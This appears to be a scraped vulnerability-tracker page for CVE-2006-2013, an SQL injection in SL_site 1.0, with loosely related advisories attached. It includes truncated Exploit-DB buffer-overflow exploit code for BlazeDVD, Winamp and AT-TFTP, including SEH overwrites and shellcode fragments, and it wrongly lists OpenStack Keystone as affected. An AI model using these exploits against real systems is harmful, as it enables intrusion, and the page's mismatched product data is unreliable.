CVE-2006-2013
published 2006-04-25CVE-2006-2013: SQL injection vulnerability in page.php in SL_site 1.0 allows remote attackers to execute arbitrary SQL commands via the id_page parameter. NOTE: this issue…
PriorityP428high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
1.41%
69.2th percentile
SQL injection vulnerability in page.php in SL_site 1.0 allows remote attackers to execute arbitrary SQL commands via the id_page parameter. NOTE: this issue could be used to produce resultant XSS from an error message.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openstack | keystone | >= 0 < 8.0.0a0 | 8.0.0a0 |
| web-provence | sl_site | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat2.1LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
OpenStack Keystone Sensitive information disclosure via log files
ghsa·2022-05-17
CVE-2013-2006 [LOW] CWE-200 OpenStack Keystone Sensitive information disclosure via log files
OpenStack Keystone Sensitive information disclosure via log files
OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode logging is enabled, logs the (1) admin_token and (2) LDAP password in plaintext, which allows local users to obtain sensitive by reading the log file.
GHSA
GHSA-53w3-777w-6rhw: SQL injection vulnerability in page
ghsa_unreviewed·2022-05-01
CVE-2006-2013 [HIGH] GHSA-53w3-777w-6rhw: SQL injection vulnerability in page
SQL injection vulnerability in page.php in SL_site 1.0 allows remote attackers to execute arbitrary SQL commands via the id_page parameter. NOTE: this issue could be used to produce resultant XSS from an error message.
Red Hat
kernel: xen: Information leak on XSAVE/XRSTOR capable AMD CPUs
vendor_redhat·2013-06-03·CVSS 2.1
CVE-2013-2076 [LOW] kernel: xen: Information leak on XSAVE/XRSTOR capable AMD CPUs
kernel: xen: Information leak on XSAVE/XRSTOR capable AMD CPUs
Xen 4.0.x, 4.1.x, and 4.2.x, when running on AMD64 processors, only save/restore the FOP, FIP, and FDP x87 registers in FXSAVE/FXRSTOR when an exception is pending, which allows one domain to determine portions of the state of floating point instructions of other domains, which can be leveraged to obtain sensitive information such as cryptographic keys, a similar vulnerability to CVE-2006-1056. NOTE: this is the documented behavior of AMD64 processors, but it is inconsistent with Intel processors in a security-relevant fashion that was not addressed by the kernels.
Statement: Not vulnerable.
This issue did not affect the versions of the kernel-xen package as shipped with Red Hat Enterprise Linux 5.
This issue did not affect R
Red Hat
keystone: DEBUG level LDAP password disclosure in log files
vendor_redhat·2013-04-19·CVSS 2.1
CVE-2013-2006 [LOW] keystone: DEBUG level LDAP password disclosure in log files
keystone: DEBUG level LDAP password disclosure in log files
OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode logging is enabled, logs the (1) admin_token and (2) LDAP password in plaintext, which allows local users to obtain sensitive by reading the log file.
No detection rules found.
Exploit-DB
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
exploitdb·2013-10-28
CVE-2006-6199 BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link:
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file
#########################################################################################
my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x
Exploit-DB
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
exploitdb·2013-07-16
CVE-2006-6199 BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
---
#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: [email protected]
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x
Exploit-DB
Winamp 5.12 - '.m3u' Local Stack Buffer Overflow
exploitdb·2013-06-17·CVSS 7.6
CVE-2006-0720 [HIGH] Winamp 5.12 - '.m3u' Local Stack Buffer Overflow
Winamp 5.12 - '.m3u' Local Stack Buffer Overflow
---
# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13
# allows user-assisted attackers to cause a denial of service
# (crash) and possibly execute arbitrary code via a crafted
# .m3u file that causes an incorrect strncpy function call
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window
# 3. Check
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
exploitdb·2013-04-12
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
---
# Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1
# Version: 2.0
# Tested on: Windows XP SP3
#
# From 1.9 Remote Exec BOF disovered in 2006 by [email protected] to 2.0 Remote DOS BOF 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite but no exception handler trigger (cookie on stack?)
# 2. Read access violation (non-exploitable?)
#
# Still we can crash the server remotely.
#
#!/usr/bin/python
import
Bugzilla
CVE-2013-2006 OpenStack keystone: DEBUG level LDAP password disclosure in log files
bugzilla·2013-04-24·CVSS 2.1
CVE-2013-2006 [LOW] CVE-2013-2006 OpenStack keystone: DEBUG level LDAP password disclosure in log files
CVE-2013-2006 OpenStack keystone: DEBUG level LDAP password disclosure in log files
j-ago reports:
A security flaw was found in the way Openstack Keystone (previously) performed management of LDAP
password and admin_token Keystone daemon configuration file values. A local attacker could use this
flaw to obtain sensitive information.
Relevant upstream patch (Gerrit form):
[3] https://review.openstack.org/#/c/26826/
External references:
https://bugs.launchpad.net/ossn/+bug/1168252
http://openwall.com/lists/oss-security/2013/04/24/1
Discussion:
Further CVE-2013-1977 vs CVE-2013-2006 ids disambiguation:
https://bugs.launchpad.net/devstack/+bug/1168252/comments/7
---
Thierry Carrez via OSS security:
"This is tracked at https://bugs.launchpad.net/keystone/+bug/1172195
Note that it only a
Bugzilla
CVE-2013-1977 openstack-keystone: Insecure management of LDAP and admin_token configuration file values
bugzilla·2013-04-19·CVSS 2.1
CVE-2013-1977 [LOW] CVE-2013-1977 openstack-keystone: Insecure management of LDAP and admin_token configuration file values
CVE-2013-1977 openstack-keystone: Insecure management of LDAP and admin_token configuration file values
A security flaw was found in the way Openstack Keystone (previously) performed management of LDAP password and admin_token Keystone daemon configuration file values. A local attacker could use this flaw to obtain sensitive information.
References:
[1] https://bugs.launchpad.net/keystone/+bug/1168252
[2] http://www.openwall.com/lists/oss-security/2013/04/19/2
Relevant upstream patch (Gerrit form):
[3] https://review.openstack.org/#/c/26826/
Discussion:
Further CVE-2013-1977 vs CVE-2013-2006 ids disambiguation:
https://bugs.launchpad.net/devstack/+bug/1168252/comments/7
---
CVE-2013-1977 does not affect our installer, as it was hardened previously and has 0600 permissions, as noted
http://secunia.com/advisories/19792http://securitytracker.com/id?1015972http://www.osvdb.org/24896http://www.securityfocus.com/bid/17667http://www.vupen.com/english/advisories/2006/1487https://exchange.xforce.ibmcloud.com/vulnerabilities/26036http://secunia.com/advisories/19792http://securitytracker.com/id?1015972http://www.osvdb.org/24896http://www.securityfocus.com/bid/17667http://www.vupen.com/english/advisories/2006/1487https://exchange.xforce.ibmcloud.com/vulnerabilities/26036
2006-04-25
Published